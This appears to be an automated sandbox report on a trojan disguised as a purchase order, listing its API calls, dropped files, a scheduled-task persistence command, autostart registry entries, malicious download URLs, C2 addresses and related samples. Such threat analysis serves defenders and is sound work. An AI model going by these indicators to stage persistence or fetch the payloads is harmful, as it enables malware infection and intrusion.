                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,1_2_00EA374E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,1_2_00ED46D0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_010020B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_010020B0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECA937 GetProcessHeap,1_2_00ECA937
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00EC8E3C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC8E19 SetUnhandledExceptionFilter,1_2_00EC8E19
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00098E19 SetUnhandledExceptionFilter,9_2_00098E19
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00098E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00098E3C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDBE95 LogonUserW,1_2_00EDBE95
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,1_2_00EA374E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE4B52 SendInput,keybd_event,1_2_00EE4B52
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE7DD5 mouse_event,1_2_00EE7DD5
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Process created: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe"
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00EDB398
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00EDBE31
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, NUHORT.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp, NUHORT.exe, 00000009.00000002.1791407269.000000000011E000.00000040.00000001.01000000.0000000B.sdmp, NUHORT.exe, 0000000A.00000002.1834093290.000000000011E000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC7254 cpuid 1_2_00EC7254
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC40DA GetSystemTimeAsFileTime,__aulldiv,1_2_00EC40DA
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F1C146 GetUserNameW,1_2_00F1C146
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00ED2C3C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00EBE47B
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: Amcache.hve.21.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                Source: Amcache.hve.21.drBinary or memory string: msmpeng.exe
                                Source: Amcache.hve.21.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4543305344.0000000001154000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: Amcache.hve.21.drBinary or memory string: MsMpEng.exe
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                Source: Yara match File source: Process Memory Space: ._cache_New PO - Supplier 0202AW-PER2.exe PID: 3848, type: MEMORYSTR
                                Source: Yara match File source: dump.pcap, type: PCAP
                                Source: Yara match File source: New PO - Supplier 0202AW-PER2.exe, type: SAMPLE
                                Source: Yara match File source: 0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: New PO - Supplier 0202AW-PER2.exe PID: 6636, type: MEMORYSTR
                                Source: Yara match File source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara match File source: C:\ProgramData\Synaptics\RCX76FB.tmp, type: DROPPED
                                Source: NUHORT.exe, 0000001B.00000002.3541717095.000000000011E000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: NUHORT.exe, 0000001B.00000003.3540024262.00000000049F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                                Source: NUHORT.exeBinary or memory string: WIN_XP
                                Source: NUHORT.exe, 00000011.00000003.2306657930.0000000004387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81=
                                Source: NUHORT.exeBinary or memory string: WIN_XPe
                                Source: NUHORT.exeBinary or memory string: WIN_VISTA
                                Source: NUHORT.exe, 0000000A.00000003.1824899216.0000000004D03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81y&
                                Source: NUHORT.exeBinary or memory string: WIN_7
                                Source: NUHORT.exe, 00000010.00000003.2071053329.00000000047C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81{
                                Source: NUHORT.exeBinary or memory string: WIN_8
                                Source: Yara match File source: Process Memory Space: ._cache_New PO - Supplier 0202AW-PER2.exe PID: 3848, type: MEMORYSTR

                                Remote Access Functionality

                                Source: Yara match File source: Process Memory Space: ._cache_New PO - Supplier 0202AW-PER2.exe PID: 3848, type: MEMORYSTR
                                Source: Yara match File source: dump.pcap, type: PCAP
                                Source: Yara match File source: New PO - Supplier 0202AW-PER2.exe, type: SAMPLE
                                Source: Yara match File source: 0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: New PO - Supplier 0202AW-PER2.exe PID: 6636, type: MEMORYSTR
                                Source: Yara match File source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara match File source: C:\ProgramData\Synaptics\RCX76FB.tmp, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00EF91DC
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00EF96E2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_000C91DC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_000C96E2
                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information421
                                Scripting
                                2
                                Valid Accounts
                                11
                                Windows Management Instrumentation
                                421
                                Scripting
                                1
                                Exploitation for Privilege Escalation
                                1
                                Disable or Modify Tools
                                21
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                4
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media
                                2
                                Native API
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Peripheral Device Discovery
                                Remote Desktop Protocol21
                                Input Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                1
                                Extra Window Memory Injection
                                21
                                Obfuscated Files or Information
                                Security Account Manager1
                                Account Discovery
                                SMB/Windows Admin Shares3
                                Clipboard Data
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                1
                                Software Packing
                                NTDS4
                                File and Directory Discovery
                                Distributed Component Object ModelInput Capture34
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd21
                                Registry Run Keys / Startup Folder
                                21
                                Access Token Manipulation
                                1
                                DLL Side-Loading
                                LSA Secrets38
                                System Information Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                                Process Injection
                                1
                                Extra Window Memory Injection
                                Cached Domain Credentials1
                                Query Registry
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job
                                112
                                Masquerading
                                DCSync251
                                Security Software Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                                Registry Run Keys / Startup Folder
                                2
                                Valid Accounts
                                Proc Filesystem121
                                Virtualization/Sandbox Evasion
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
                                Virtualization/Sandbox Evasion
                                /etc/passwd and /etc/shadow3
                                Process Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation
                                Network Sniffing11
                                Application Window Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                                Process Injection
                                Input Capture1
                                System Owner/User Discovery
                                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                [Behavior graph: ID 1580482, Sample: New PO - Supplier 0202AW-PER2.exe, Startdate: 24/12/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label
New PO - Supplier 0202AW-PER2.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics
New PO - Supplier 0202AW-PER2.exe | 100% | Avira | TR/Dldr.Agent.SH
New PO - Supplier 0202AW-PER2.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
New PO - Supplier 0202AW-PER2.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\Documents\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH
C:\Users\user\Documents\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\AppData\Local\Temp\QHCPYO.vbs | 100% | Avira | VBS/Runner.VPJI
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\RCX76FB.tmp | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX76FB.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\~$cache1 | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\RCX76FB.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics
C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | 50% | ReversingLabs | Win32.Trojan.Lisk
C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | 50% | ReversingLabs | Win32.Trojan.Lisk
                                No Antivirus matches
                                No Antivirus matches
Source | Detection | Scanner | Label
https://docs.google.comuc?id=0BxsMXGfPIZfSVlVs | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SSLLibrary.dl | 100% | Avira URL Cloud | malware
http://xred.site50.net/syn/Synaptics.rar8 | 100% | Avira URL Cloud | malware
http://xred.site50.net/syn/SSLLibrary.dll | 100% | Avira URL Cloud | malware
http://xred.site50.net/syn/Synaptics.rar | 100% | Avira URL Cloud | malware
https://docs.google | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SUpdate.ini | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 142.250.181.14 | true | false | | high
drive.usercontent.google.com | 142.250.181.97 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
xred.mooo.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.14 | docs.google.com | United States | 15169 | GOOGLEUS | false
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
142.250.181.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580482
Start date and time: 2024-12-24 18:19:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: New PO - Supplier 0202AW-PER2.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@26/51@22/4
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 90
                                                                                                                  • Number of non-executed functions: 273
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 20.42.65.91, 52.182.143.212, 20.189.173.20, 20.189.173.22, 20.231.128.65, 184.28.90.27, 20.12.23.50, 13.107.246.63
                                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdeus17.eastus.cloudapp.azure.com, otelrules.afd.azureedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, weu-azsc-config.officeapps.live.com, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                  • Execution Graph export aborted for target Synaptics.exe, PID 4076 because there are no executed function
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                  • VT rate limit hit for: New PO - Supplier 0202AW-PER2.exe
Time | Type | Description
12:20:07 | API Interceptor | 996x Sleep call for process: Synaptics.exe modified
12:22:04 | API Interceptor | 1882633x Sleep call for process: splwow64.exe modified
12:22:24 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
17:20:04 | Task Scheduler | Run new task: QHCPYO.exe path: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
17:20:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run QHCPYO "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
17:20:13 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
17:20:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run QHCPYO "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
17:20:29 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QHCPYO.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.111.138.100 | RNEQTT.exe | malicious | LodaRAT, XRed |
172.111.138.100 | Bank Information Details.bat | malicious | LodaRAT, XRed |
172.111.138.100 | Purchase Order Supplies.Pdf.exe | malicious | LodaRAT |
172.111.138.100 | bf-p2b.exe | malicious | LodaRAT |
172.111.138.100 | gry.exe | malicious | Unknown |
172.111.138.100 | dlawt.exe | malicious | LodaRat |
172.111.138.100 | nXi3rwhMmB.exe | malicious | LodaRat |
69.42.215.252 | RNEQTT.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | ZmrwoZsbPp.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | ccmsetup.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Synaptics.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | RezQY7jWu8.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Dzsb.Qyd.Install.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Bank Information Details.bat | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | System Volume Information.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | P4.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Supplier RFQ ID 365242213q___________________________pdf.exe | malicious | Snake Keylogger, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net | aYf5ibGObB.exe | malicious | RedLine | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.com | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Audio02837498.html | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | gDPzgKHFws.exe | malicious | Cryptbot | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | http://au.kirmalk.com/watch.php?vid=7750fd3c8 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://www.bing.com/search?pglt=41&q=%E5%B9%B3%E6%88%9031%E5%B9%B4+%E8%A5%BF%E6%9A%A6&cvid=467cba4c80be484e858dd735013f0921&gs_lcrp=EgRlZGdlKgYIARAAGEAyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyCAgJEOkHGPxV0gEINjUyMGowajGoAgCwAgE&FORM=ANNAB1&PC=U531 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | pwn.dll.dll | malicious | CobaltStrike | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 2S5jaCcFo5.exe | malicious | Unknown | 13.107.246.63
freedns.afraid.org | RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | ccmsetup.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | Synaptics.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | RezQY7jWu8.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | Dzsb.Qyd.Install.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | Bank Information Details.bat | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | System Volume Information.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | P4.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | Supplier RFQ ID 365242213q___________________________pdf.exe | malicious | Snake Keylogger, XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VOXILITYGB | RNEQTT.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | malicious | Remcos | 104.243.246.120
VOXILITYGB | nabsh4.elf | malicious | Unknown | 46.243.206.70
VOXILITYGB | 7jBzTH9FXQ.exe | malicious | Unknown | 37.221.166.158
VOXILITYGB | fACYdCvub8.exe | malicious | Unknown | 5.254.60.108
VOXILITYGB | powerpc.nn.elf | malicious | Mirai, Okiru | 37.221.160.225
VOXILITYGB | Bank Information Details.bat | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | 1730537046a28265099d74997f6aaf573f6441587128b68a620c5fd7396901e33fe86509f2931.dat-decoded.exe | malicious | Njrat | 104.243.246.120
VOXILITYGB | Purchase Order Supplies.Pdf.exe | malicious | LodaRAT | 172.111.138.100
VOXILITYGB | zR4aIjCuRs.exe | malicious | Remcos, GuLoader | 45.74.58.7
AWKNET-LLCUS | RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | ccmsetup.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | Synaptics.exe | malicious | XRed | 69.42.215.252
